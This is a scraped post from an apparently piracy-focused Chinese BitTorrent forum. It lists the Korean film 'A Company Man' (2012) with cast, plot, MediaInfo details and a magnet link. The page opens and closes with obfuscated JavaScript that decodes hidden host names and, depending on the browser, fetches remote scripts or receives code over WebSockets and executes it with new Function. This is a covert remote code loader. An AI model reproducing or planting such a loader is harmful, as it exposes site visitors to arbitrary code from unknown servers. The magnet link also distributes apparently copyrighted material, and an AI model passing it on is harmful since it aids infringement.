公司职员[中文字幕].A.Company.Man.2012.1080p.WEB-DL.H265.AAC 1.98GB

版主小s 1月前 2199

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 公司职员 / 企业杀手(港) / 超完美杀手(台) / 上班族 / 职员 / A Company Man

◎片 名 ???

◎年 代 2012

◎产 地 韩国

◎类 别 剧情 / 动作 / 犯罪

◎语 言 韩语

◎上映日期 2012-10-11(韩国)

◎IMDb链接 https://www.imdb.com/title/tt2371486/

◎豆瓣评分 6.6/10 (16881人评价)

◎豆瓣链接 https://movie.douban.com/subject/6080756/

◎片 长 96分钟

◎导 演 林相润 Lim Sang-Yoon (id:1325707)

◎编 剧 林相润 Lim Sang-Yoon (id:1325707)

李宥彬 Yubin Lee (id:1335395)

◎演 员 苏志燮 Ji-seob So (id:1042119)

李美妍 Mi-yeon Lee (id:1029067)

郭度沅 Do-Won Kwak (id:1320516)

金桐俊 Kim Dong Joon (id:1325724)

李载允 Jae-yoon Lee (id:1336343)

权信焕 Shin-Hwan Joon (id:1433752)

李璟荣 Kyeong-yeong Lee (id:1039491)

李文贞 Lee Moon-jung (id:1390513)

朴镇宇 Park Jin-woo (id:1376719)

全信焕 ??? (id:1438333)

金正堂 Joong-don Kim (id:1440541)

李澾 Lee Dal (id:1381020)

金瑞元 Kim Seo-won (id:1388640)

全国焕 Gook-hwan Jeon (id:1339794)

洪熙源 Hong Hee-won (id:1381947)

郑煐禥 Young-ki Jung (id:1350785)

韩宝贝 Bo-bae Han (id:1003490)

刘河福 Ha-bok Yoo (id:1376443)

朴智秀 Ji-soo Park (id:1336182)

郑基燮 Gi-seop Jeong (id:1381664)

姜申河 Shin-ha Kang (id:1456531)

李圣贤 Mowg (id:1329977)

◎标 签 韩国 / 苏志燮 / 动作 / 犯罪 / 韩国电影 / 2012 / 剧情 / 大叔

◎简 介

看似平凡的五金制造公司其实是一所铜金属一样冰冷无情的杀人公司。池炯道(苏志燮 饰)虽然整日西服革履,却是该公司业绩卓人的职业杀手。他为公司供职十年,没有一次失手,早已磨练出冷血气质和杀人不眨眼的狠心。但遇到来公司“打工”的新人罗勋(金东俊 饰)时,他突然看到了自己当年的影子。在和罗勋一起执行任务时,炯道有了片刻的恍惚。通过和罗勋的家人交流,他越来越感到亲情的温暖,更在遇到心爱的女人刘美妍(李美妍 饰)时,他的职业敏感发生了变化。在执行一次任务时,因犹豫而导致任务失败,这也让炯道第一次萌生退意,但事情远没有他想象的那样简单。一天之内,他从公司最有前途的职员变为公司的敌人,遭到原同事们追杀的“目标”……

◎获奖情况 (共1项)

第49届百想艺术大赏 (2013)

电影类 最佳人气男演员(提名)

└──苏志燮 (id:1042119)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 35725972826159829917249326663415201407 (0x1AE09274377BB59B968FE8989A397E7F)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 1.98 GiB

  8. Duration : 1 h 36 min

  9. Overall bit rate : 2 941 kb/s

  10. Encoded date : UTC 2021-11-02 12:34:42

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 36 min

  20. Bit rate : 2 749 kb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.073

  30. Stream size : 1.85 GiB (93%)

  31. Default : Yes

  32. Forced : No


  33. Audio

  34. ID : 2

  35. Format : AAC LC

  36. Format/Info : Advanced Audio Codec Low Complexity

  37. Codec ID : A_AAC-2

  38. Duration : 1 h 36 min

  39. Bit rate : 192 kb/s

  40. Channel(s) : 2 channels

  41. Channel layout : L R

  42. Sampling rate : 44.1 kHz

  43. Frame rate : 43.066 FPS (1024 SPF)

  44. Compression mode : Lossy

  45. Delay relative to video : 40 ms

  46. Stream size : 131 MiB (6%)

  47. Language : Korean

  48. Default : Yes

  49. Forced : No


  50. Text #1

  51. ID : 3

  52. Format : UTF-8

  53. Codec ID : S_TEXT/UTF8

  54. Codec ID/Info : UTF-8 Plain Text

  55. Duration : 1 h 30 min

  56. Bit rate : 24 b/s

  57. Count of elements : 732

  58. Stream size : 16.5 KiB (0%)

  59. Title : Chinese Simplified

  60. Language : Chinese

  61. Default : Yes

  62. Forced : No


  63. Text #2

  64. ID : 4

  65. Format : UTF-8

  66. Codec ID : S_TEXT/UTF8

  67. Codec ID/Info : UTF-8 Plain Text

  68. Duration : 1 h 30 min

  69. Bit rate : 26 b/s

  70. Count of elements : 697

  71. Stream size : 17.5 KiB (0%)

  72. Title : Chinese Traditional

  73. Language : Chinese

  74. Default : No

  75. Forced : No


  76. Text #3

  77. ID : 5

  78. Format : UTF-8

  79. Codec ID : S_TEXT/UTF8

  80. Codec ID/Info : UTF-8 Plain Text

  81. Duration : 1 h 32 min

  82. Bit rate : 27 b/s

  83. Count of elements : 720

  84. Stream size : 18.6 KiB (0%)

  85. Title : English

  86. Language : English

  87. Default : No

  88. Forced : No




复制代码


TAGS 动作 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:05D95B6DAB42AA79573095856CEF815465F93F49

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};